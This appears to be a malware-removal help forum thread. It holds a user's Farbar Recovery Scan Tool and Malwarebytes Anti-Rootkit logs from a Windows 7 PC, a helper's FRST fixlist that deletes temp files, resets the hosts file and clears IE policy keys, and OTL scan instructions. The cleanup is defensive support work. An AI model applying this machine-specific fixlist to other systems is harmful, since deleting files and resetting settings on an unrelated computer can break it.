07-11-2014 02:21:37 Windows Update
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2014-11-03 15:18 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {372C798C-A5B3-4AA4-BBF2-B7E73240D486} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {503D3F2D-3467-4AD0-AB8F-6DC6CC77FC61} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {795C9DD4-84DD-4612-B8E5-6C26954A7C70} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {7A4BB95A-5FCC-432C-90F8-E7E4AB110F1C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {C5E1112F-43F2-4BEE-99A2-79ADA35DF515} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {F741AF84-829D-46EF-8DB7-4841CBC7DCCE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
==================== Loaded Modules (whitelisted) =============
2011-04-25 10:24 - 2011-04-25 10:24 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2012-04-27 17:43 - 2012-03-19 17:09 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-03-09 08:58 - 2012-03-09 08:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2012-03-09 08:58 - 2012-03-09 08:58 - 00057208 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2012-04-17 11:20 - 2012-04-17 11:20 - 00293376 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\vCapture64.dll
2012-03-28 13:15 - 2012-03-28 13:15 - 00013824 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\WMI_DLL64.dll
2012-04-27 17:03 - 2012-03-28 09:36 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 13:16 - 2014-01-20 13:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 18:30 - 2012-05-03 16:56 - 00089600 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
2012-05-18 18:30 - 2012-05-03 11:48 - 00093696 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
2012-05-18 18:30 - 2012-04-20 18:11 - 00034816 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
2012-05-18 18:30 - 2012-03-15 12:19 - 00241664 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
2012-04-27 17:03 - 2012-03-28 09:18 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\Windows:nlsPreferences
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-1987813687-3303645166-2786259458-500 - Administrator - Disabled)
Guest (S-1-5-21-1987813687-3303645166-2786259458-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1987813687-3303645166-2786259458-1003 - Limited - Enabled)
Ryan (S-1-5-21-1987813687-3303645166-2786259458-1001 - Administrator - Enabled) => C:\Users\Ryan
UpdatusUser (S-1-5-21-1987813687-3303645166-2786259458-1000 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 04:11:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (11/05/2014 05:41:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
System errors:
=============
Error: (11/07/2014 03:53:51 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/07/2014 01:39:10 AM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/06/2014 09:11:04 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/06/2014 04:11:26 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/05/2014 05:40:52 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 10:19:29 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 03:29:58 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 03:24:36 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 00:41:25 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/03/2014 09:32:20 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Microsoft Office Sessions:
=========================
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 04:11:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
Error: (11/05/2014 05:41:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
CodeIntegrity Errors:
===================================
Date: 2014-11-03 15:18:28.899
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-11-03 15:18:28.884
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 23%
Total physical RAM: 8085.95 MB
Available physical RAM: 6189.85 MB
Total Pagefile: 16170.07 MB
Available Pagefile: 13540.86 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:919.21 GB) (Free:829.65 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 868B7EFA)
Partition 1: (Active) - (Size=600 MB) - (Type=27)
Partition 2: (Not Active) - (Size=919.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=27)
==================== End Of Log ============================
Malwarebytes Anti-Rootkit BETA 1.08.0.1001
www.malwarebytes.org
Database version: v2014.11.07.06
Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.17358
Ryan :: RYAN-PC [administrator]
11/7/2014 6:24:49 PM
mbar-log-2014-11-07 (18-24-49).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 407325
Time elapsed: 9 minute(s), 56 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 0
(No malicious items detected)
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 0
(No malicious items detected)
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 0
(No malicious items detected)
Files Detected: 0
(No malicious items detected)
Physical Sectors Detected: 0
(No malicious items detected)
(end)
---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.08.0.1001
(c) Malwarebytes Corporation 2011-2012
OS version: 6.1.7601 Windows 7 Service Pack 1 x64
Account is Administrative
Internet Explorer version: 11.0.9600.17358
File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 2.294000 GHz
Memory total: 8478728192, free: 6701981696
Downloaded database version: v2014.11.07.06
Downloaded database version: v2014.11.01.02
=======================================
Initializing...
------------ Kernel report ------------
11/07/2014 18:24:40
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kdcom.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\CLFS.SYS
\SystemRoot\system32\CI.dll
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\ACPI.sys
\SystemRoot\system32\drivers\WMILIB.SYS
\SystemRoot\system32\drivers\msisadrv.sys
\SystemRoot\system32\drivers\pci.sys
\SystemRoot\system32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\iusb3hcs.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\system32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\system32\drivers\iaStor.sys
\SystemRoot\system32\drivers\amdxata.sys
\SystemRoot\system32\drivers\fltmgr.sys
\SystemRoot\system32\drivers\fileinfo.sys
\SystemRoot\system32\DRIVERS\MpFilter.sys
\SystemRoot\System32\Drivers\Ntfs.sys
\SystemRoot\System32\Drivers\msrpc.sys
\SystemRoot\System32\Drivers\ksecdd.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\system32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\spldr.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\system32\DRIVERS\nvpciflt.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\System32\drivers\hwpolicy.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\system32\drivers\disk.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\drivers\VIDEOPRT.SYS
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\system32\drivers\rdpencdd.sys
\SystemRoot\system32\drivers\rdprefmp.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\ws2ifsl.sys
\SystemRoot\system32\DRIVERS\wfplwf.sys
\SystemRoot\system32\DRIVERS\pacer.sys
\SystemRoot\system32\DRIVERS\vwififlt.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\drivers\termdd.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\system32\drivers\mssmbios.sys
\SystemRoot\System32\drivers\discache.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\drivers\blbdrive.sys
\SystemRoot\system32\DRIVERS\tunnel.sys
\SystemRoot\system32\DRIVERS\nvlddmkm.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\dxgmms1.sys
\SystemRoot\system32\DRIVERS\igdkmd64.sys
\SystemRoot\system32\DRIVERS\iusb3xhc.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\drivers\HECIx64.sys
\SystemRoot\system32\drivers\usbehci.sys
\SystemRoot\system32\drivers\USBPORT.SYS
\SystemRoot\system32\drivers\HDAudBus.sys
\SystemRoot\system32\DRIVERS\Rt64win7.sys
\SystemRoot\system32\DRIVERS\athrx.sys
\SystemRoot\system32\DRIVERS\vwifibus.sys
\SystemRoot\system32\drivers\i8042prt.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\drivers\tpm.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\intelppm.sys
\SystemRoot\system32\drivers\CompositeBus.sys
\SystemRoot\system32\DRIVERS\AgileVpn.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\rassstp.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\vrvd5.sys
\SystemRoot\system32\drivers\swenum.sys
\SystemRoot\system32\drivers\ks.sys
\SystemRoot\system32\DRIVERS\btath_bus.sys
\SystemRoot\system32\drivers\umbus.sys
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\DRIVERS\iusb3hub.sys
\SystemRoot\system32\DRIVERS\CSLFDx64.sys
\SystemRoot\system32\drivers\HdAudio.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\system32\DRIVERS\usbprint.sys
\SystemRoot\System32\Drivers\dump_iaStor.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\system32\DRIVERS\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\DRIVERS\ViWDM.SYS
\SystemRoot\system32\drivers\hidusb.sys
\SystemRoot\system32\drivers\HIDCLASS.SYS
\SystemRoot\system32\drivers\HIDPARSE.SYS
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\System32\Drivers\usbvideo.sys
\SystemRoot\system32\DRIVERS\rfcomm.sys
\SystemRoot\System32\Drivers\RtsUStor.sys
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\DRIVERS\lltdio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\DRIVERS\rspndr.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\Drivers\secdrv.SYS
\SystemRoot\System32\DRIVERS\srvnet.sys
\??\C:\Windows\system32\Drivers\SSPORT.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\system32\DRIVERS\NisDrvWFP.sys
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\DRIVERS\btfilter.sys
\SystemRoot\System32\Drivers\BTHUSB.sys
\SystemRoot\System32\Drivers\bthport.sys
\SystemRoot\system32\drivers\BthEnum.sys
\SystemRoot\system32\DRIVERS\bthpan.sys
\SystemRoot\system32\DRIVERS\btath_rcp.sys
\SystemRoot\system32\drivers\btath_avdt.sys
\SystemRoot\system32\drivers\btath_a2dp.sys
\SystemRoot\system32\DRIVERS\btath_hcrp.sys
\SystemRoot\system32\DRIVERS\btath_flt.sys
\SystemRoot\system32\DRIVERS\btath_lwflt.sys
\??\C:\Windows\system32\drivers\mbamchameleon.sys
\??\C:\Windows\system32\drivers\MBAMSwissArmy.sys
\Windows\System32\ntdll.dll
\Windows\System32\smss.exe
\Windows\System32\apisetschema.dll
\Windows\System32\autochk.exe
\Windows\System32\user32.dll
\Windows\System32\imm32.dll
\Windows\System32\shlwapi.dll
\Windows\System32\usp10.dll
\Windows\System32\imagehlp.dll
\Windows\System32\ws2_32.dll
\Windows\System32\lpk.dll
\Windows\System32\iertutil.dll
\Windows\System32\normaliz.dll
\Windows\System32\psapi.dll
\Windows\System32\difxapi.dll
\Windows\System32\oleaut32.dll
\Windows\System32\gdi32.dll
\Windows\System32\urlmon.dll
\Windows\System32\advapi32.dll
\Windows\System32\clbcatq.dll
\Windows\System32\setupapi.dll
\Windows\System32\comdlg32.dll
\Windows\System32\msvcrt.dll
\Windows\System32\shell32.dll
\Windows\System32\kernel32.dll
\Windows\System32\Wldap32.dll
\Windows\System32\ole32.dll
\Windows\System32\wininet.dll
\Windows\System32\rpcrt4.dll
\Windows\System32\nsi.dll
\Windows\System32\msctf.dll
\Windows\System32\sechost.dll
\Windows\System32\comctl32.dll
\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll
\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dll
\Windows\System32\KernelBase.dll
\Windows\System32\cfgmgr32.dll
\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dll
\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dll
\Windows\System32\devobj.dll
\Windows\System32\crypt32.dll
\Windows\System32\userenv.dll
\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll
\Windows\System32\wintrust.dll
\Windows\System32\msasn1.dll
\Windows\System32\profapi.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xfffffa8007a9f790
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IAAStorageDevice-0\
Lower Device Object: 0xfffffa80076da050
Lower Device Driver Name: \Driver\iaStor\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xfffffa8007a9f790, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa8007a9f2c0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa8007a9f790, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80074f1660, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa80076da050, DeviceName: \Device\Ide\IAAStorageDevice-0\, DriverName: \Driver\iaStor\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 868B7EFA
Partition information:
Partition 0 type is Other (0x27)
Partition is ACTIVE.
Partition starts at LBA: 2048 Numsec = 1228800
Partition file system is NTFS
Partition is bootable
Partition 1 type is Primary (0x7)
Partition is NOT ACTIVE.
Partition starts at LBA: 1230848 Numsec = 1927714816
Partition 2 type is Other (0x27)
Partition is NOT ACTIVE.
Partition starts at LBA: 1928945664 Numsec = 24576000
Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Disk Size: 1000204886016 bytes
Sector size: 512 bytes
Done!
Scan finished
=======================================
Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removal finished
The version of Spybot on your machine the free version?
At this time I would like to ask that you uninstall SpyBot in case it's preventing changes I script in here and to ensure the removal of bad entries.
Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
EmptyTemp:
Hosts:
End
Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
~~~~~~~~~~~~~~~~~
Download OTL (http://oldtimer.geekstogo.com/OTL.exe) to your desktop.
Double click on the icon to run it.
Make sure all other windows are closed and to let it run uninterrupted.
https://dl.dropbox.com/u/73555776/OTL_Main_Tutorial.gif
Select All Users.
Under the Custom Scan box paste this text in bold in
netsvcs
BASESERVICES
%SYSTEMDRIVE%\*.exe
/md5start
services.*
explorer.exe
winlogon.exe
Userinit.exe
svchost.exe
winsock.*
/md5stop
CREATERESTOREPOINT
Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
Post both logs DO NOT ATTACH THEM.
ascot1340
2014-11-08, 21:56
Should I check the "LOP Check" and "Purity Check" boxes as is indicated on your image or leave them unchecked?
At this time the below is really all I need.
Under the Custom Scan box paste this text in bold in
netsvcs
BASESERVICES
%SYSTEMDRIVE%\*.exe
/md5start
services.*
explorer.exe
winlogon.exe
Userinit.exe
svchost.exe
winsock.*
/md5stop
ascot1340
2014-11-09, 22:47
I keep getting a HTTP 500 Internal Server Error "the website cannot display the page" message when I try to post the logs. I'll attempt to paste them in separate posts and see if that helps. Here is the FRST log:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 08-11-2014 01
Ran by Ryan at 2014-11-08 13:01:05 Run:2
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll
